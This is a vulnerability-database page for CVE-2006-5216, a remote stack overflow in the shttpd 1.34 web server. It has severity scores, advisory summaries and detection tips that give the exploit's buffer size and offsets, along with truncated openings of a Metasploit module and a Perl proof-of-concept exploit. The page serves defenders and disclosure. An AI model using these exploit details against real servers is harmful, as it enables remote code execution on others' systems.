CVE-2006-5216
published 2006-10-10CVE-2006-5216: Stack-based buffer overflow in Sergey Lyubka Simple HTTPD (shttpd) 1.34 allows remote attackers to execute arbitrary code via a long URI.
PriorityP259high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
63.33%
99.1th percentile
Stack-based buffer overflow in Sergey Lyubka Simple HTTPD (shttpd) 1.34 allows remote attackers to execute arbitrary code via a long URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sergey_lyubka | simple_httpd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect oversized URI-encoded POST requests to port 80 targeting shttpd; the exploit sends a POST request with a ~4000-byte URI-encoded path beginning with 'post /' (lowercase) followed by a large alphanumeric+URI-encoded payload. ↗
- →The overflow is triggered via a long URI in a POST request; the return address is overwritten at offset 8 within the 4000-byte pattern, and shellcode is placed at offset 103. Alert on POST requests with URI lengths exceeding normal bounds (e.g., >1000 bytes). ↗
- →The original PoC exploit sends a POST request with a large buffer in the URI path and a minimal HOST header with no space after the colon (HOST:$host), which may be detectable as a malformed HTTP header. ↗
- ·The Metasploit module targets Windows platforms only (win); the exploit uses platform-specific hardcoded return addresses for each Windows OS/SP combination and will not work against non-Windows deployments of shttpd. ↗
- ·The original PoC was tested specifically on shttpd 1.34 running on Windows XP SP1 Hebrew; behavior on other locales or service pack levels may differ. ↗
- ·The exploit is described as 'Privileged => false', meaning the resulting shell runs with the privileges of the shttpd process, not necessarily SYSTEM. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Sergey Lyubka Simple HTTPD 1.34 stack-based overflow (EDB-2482 / XFDB-29368)
vuldb·2026-04-24·CVSS 7.5
CVE-2006-5216 [HIGH] Sergey Lyubka Simple HTTPD 1.34 stack-based overflow (EDB-2482 / XFDB-29368)
A vulnerability was found in Sergey Lyubka Simple HTTPD 1.34. It has been declared as critical. This impacts an unknown function. Executing a manipulation can lead to stack-based buffer overflow.
This vulnerability appears as CVE-2006-5216. The attack may be performed from remote. In addition, an exploit is available.
It is advisable to implement a patch to correct this issue.
GHSA
GHSA-f9h4-953h-vx5r: Stack-based buffer overflow in Sergey Lyubka Simple HTTPD (shttpd) 1
ghsa_unreviewed·2022-05-01
CVE-2006-5216 [HIGH] GHSA-f9h4-953h-vx5r: Stack-based buffer overflow in Sergey Lyubka Simple HTTPD (shttpd) 1
Stack-based buffer overflow in Sergey Lyubka Simple HTTPD (shttpd) 1.34 allows remote attackers to execute arbitrary code via a long URI.
No detection rules found.
Exploit-DB
SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2006-5216 SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)
SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)
---
##
# $Id: shttpd_post.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SHTTPD %q{
This module exploits a stack buffer overflow in SHTTPD [ 'LMH ', 'hdm', 'skOd'],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2006-5216'],
[ 'OSVDB', '29565' ],
[ 'URL', 'http://shttpd.sourceforge.net'],
[ 'BID', '20393'],
],
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'wi
Exploit-DB
SHTTPD 1.34 - 'POST' Remote Buffer Overflow
exploitdb·2006-10-05
CVE-2006-5216 SHTTPD 1.34 - 'POST' Remote Buffer Overflow
SHTTPD 1.34 - 'POST' Remote Buffer Overflow
---
#!/usr/bin/perl -w
# SHTTPD Buffer Overflow (POST)
# Tested on SHTTPD 1.34 WinXP SP1 Hebrew
# http://shttpd.sourceforge.net
# Codded By SkOd, 05/10/2006
# ISRAEL
#
# details:
# EAX 00000194 , ECX 009EBCA8 , EDX 00BC488C
# EBX 00000004 , EIP 41414141 , EBP 41414141
# ESI 00BC4358 , EDI 00BCC3CC ASCII "POST"
# ESP 009EFC08 ASCII 41,"AA...AAA"
use IO::Socket;
sub fail(){
syswrite STDOUT, "[-]Connect failed.\n";
exit;
}
sub header()
{
print("##################################\n");
print("SHTTPD (POST) Buffer Overflow.\n");
print("[http://shttpd.sourceforge.net]\n");
print("Codded By SkOd, 05/10/2006\n");
print("##################################\n");
}
if (@ARGV new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || &fail();
sy
Metasploit
SHTTPD URI-Encoded POST Request Overflow
metasploit
SHTTPD URI-Encoded POST Request Overflow
SHTTPD URI-Encoded POST Request Overflow
This module exploits a stack buffer overflow in SHTTPD <= 1.34. The vulnerability is caused due to a boundary error within the handling of POST requests. Based on an original exploit by skOd but using a different method found by hdm.
No writeups or analysis indexed.
http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txthttp://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050146.htmlhttp://secunia.com/advisories/22294http://securitytracker.com/id?1017088http://www.securityfocus.com/bid/20393http://www.vupen.com/english/advisories/2006/3939https://exchange.xforce.ibmcloud.com/vulnerabilities/29368https://www.exploit-db.com/exploits/2482http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txthttp://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050146.htmlhttp://secunia.com/advisories/22294http://securitytracker.com/id?1017088http://www.securityfocus.com/bid/20393http://www.vupen.com/english/advisories/2006/3939https://exchange.xforce.ibmcloud.com/vulnerabilities/29368https://www.exploit-db.com/exploits/2482
2006-10-10
Published